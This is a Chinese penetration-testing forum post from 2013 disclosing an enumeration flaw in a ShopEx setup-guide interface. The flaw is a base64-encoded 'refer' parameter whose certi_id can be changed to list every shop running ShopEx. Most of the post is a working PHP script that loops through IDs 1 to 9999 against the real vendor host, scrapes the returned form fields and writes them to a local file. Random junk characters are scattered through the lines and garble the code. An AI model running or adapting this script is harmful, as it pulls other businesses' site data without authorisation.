找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 ShopEx某接口缺陷可遍历所有用户网站
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 3093|回复: 0
打印 上一主题 下一主题

ShopEx某接口缺陷可遍历所有用户网站

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-9-21 15:59:47 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:& ?  }' C* U: _% a
ShopEx某接口缺陷,可遍历所有网站  ]% s5 V- U/ Q8 U8 L  X
详细说明:8 G9 T" U( h- {5 ]9 c
问题出现在shopex 网店使用向导页面
. y/ \- V! N2 K9 x) `
: ^. I# N0 ~8 [3 V- i  R9 s3 G' T9 A1 \0 R$ M7 s# o* j2 p& p7 m  x
: E- F# r+ ]6 _' T5 Z/ I
http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=) t+ g" d& E+ \5 V/ ^: w
# [+ Z* x! n- n, P9 H

% Y: V- P( X1 H% P3 D7 s) f# o/ l* I2 i0 j( u7 B
refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
9 u- j4 r/ l2 F0 _9 \5 j$ l* t4 x6 Z

  t% L4 e" w4 B: g  Z: X, u; [- m8 B% a9 m& N8 a1 B
我们修改certi_id 即可遍历所有使用了ShopEx程序的网站 * C$ D" i  o/ t4 b* A# _

) m+ d( h% u) j8 l+ }/ u' a
3 x) }4 o- X1 Q' o6 A9 t# D, n7 {$ j& ?& n& c
<?php
  Y3 ~8 L) b. v, k6 }) C( o2 ]; w" t  q9 p& F% W: b1 T3 R; l
                for ($i=1; $i < 10000; $i++) { //遍历
) n" v6 T3 ^6 x$ O8 \9 o/ [* K2 s: O: j+ X8 l5 x% v
                        ShowshopExD($i);" r, Z" e0 n. f% n/ C# G2 J
4 |. B1 U, U6 o/ K9 C% z
                }
, O' k1 |2 c1 y  Y4 N, S( Y; D: q+ c' r8 m% O( o6 I
                function ShowshopExD($cid) {: l/ o9 T2 G4 M5 x( z1 T1 E
9 Q3 b  \' h5 {
                $url='http://guide.ecos.shopex.cn/step2.php';
7 D/ W) J, w+ J% l: l
& {" \+ j" v, l( ?* y) X" ~0 `                $refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');/ J( y. z# D# m' P9 i8 b+ w1 ^& H

7 p5 `4 W2 j3 v* M        $url = $url.'?refer='.$refer;
3 A% c% J2 c/ O5 i5 a3 E9 Q3 c5 a4 [% B" l! A
        $ch = curl_init($url);, I/ ~6 @1 T0 L7 s& m

# [* Z! u2 q3 x3 e9 q        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;8 S) M- R. f/ Y' n# t

* ~! k4 Y0 R( l5 z# q2 i9 W2 `6 o        curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;
" i* T! G4 }( `' \; _* Q! e6 i& I0 b; N9 W( }0 C6 ?
        $result = curl_exec($ch);
& l6 ^2 W: g) R; q! S: h7 d* q) |( {
        $result = mb_convert_encoding($result, "gb2312", "UTF-8");  j0 g6 d3 i/ A, [* k% k
0 f; {% y! L. n/ B3 X
        if(strpos($result,$refer))
% u$ ?0 u9 I# N0 b8 n. m/ ^! F5 V8 g* n* Q! N3 u  H, \
        {8 X; x8 Y+ n) I, D- e
( h. l# h" Y  n9 [# g, |
                $fp = fopen("c:/shopEx.txt",'ab'); //保存文件
, A3 k' h. {! ^/ \* O/ G" d* R* U  Y; T$ ~. D
                        preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);: V  ?5 T2 d7 {2 b% n) B, B# J; @  a5 ?

* f$ z) `. t' {: i/ T                foreach ($value[1] as $key) {; P" t( c9 X1 x
/ m  d+ F' @2 `
                        preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);3 i+ Q- k/ W4 {

0 L7 N) Y# W" K3 Y  z1 u                        echo $res[1][0].':'.$res[3][0]."\r\n";
" p5 x/ g  |7 O2 s& E; ]9 F. w: x& _4 a2 D2 e# B+ F+ f
                        $col =$res[1][0].':'.$res[3][0]."\r\n"; 4 s: `% ^9 ?+ `5 n7 j! t7 h6 E; n
+ |" c9 `' Z6 d0 X# b0 W
                        fwrite($fp, $col, strlen($col));
( o  V1 I( j& J/ u
" `/ j6 F  P( Y' s/ Z+ d  j* E0 T                }5 _7 _' i( m& Q5 b: l
4 A$ c. V' v8 _( n
                echo '--------------------------------'."\r\n";
/ }+ E/ F: Z! w' _! Q
+ k( T; ^. J: T' [* i- L                fclose($fp); 7 r. I2 h# g7 l0 X! `- h8 l; v
$ Y9 ~( r! N& Y8 u9 H4 h; S
        }4 ^$ h# E9 d/ a! e7 B* a7 I

/ [- ^2 c4 E' L8 E        flush();
1 B/ ~' z! g1 P/ h2 H6 m4 s1 B& R# o
        curl_close($ch);: H5 n9 J9 U1 ]0 r1 Q
6 n$ D9 `9 b/ I5 |8 o5 @; A1 x7 d- L
                }7 G& q" t2 B) ~( A
+ \* s* A& J2 @, W4 {
?>
' W; x, T( A" v$ B# i$ V漏洞证明:
, P) S, a2 y/ ghttp://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
" R1 \- t# M0 i4 Irefer换成其他加密方式! W2 G" V! v* t- R" M3 s' c
function, shopex, 接口, 网站, 用户

相关帖子
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表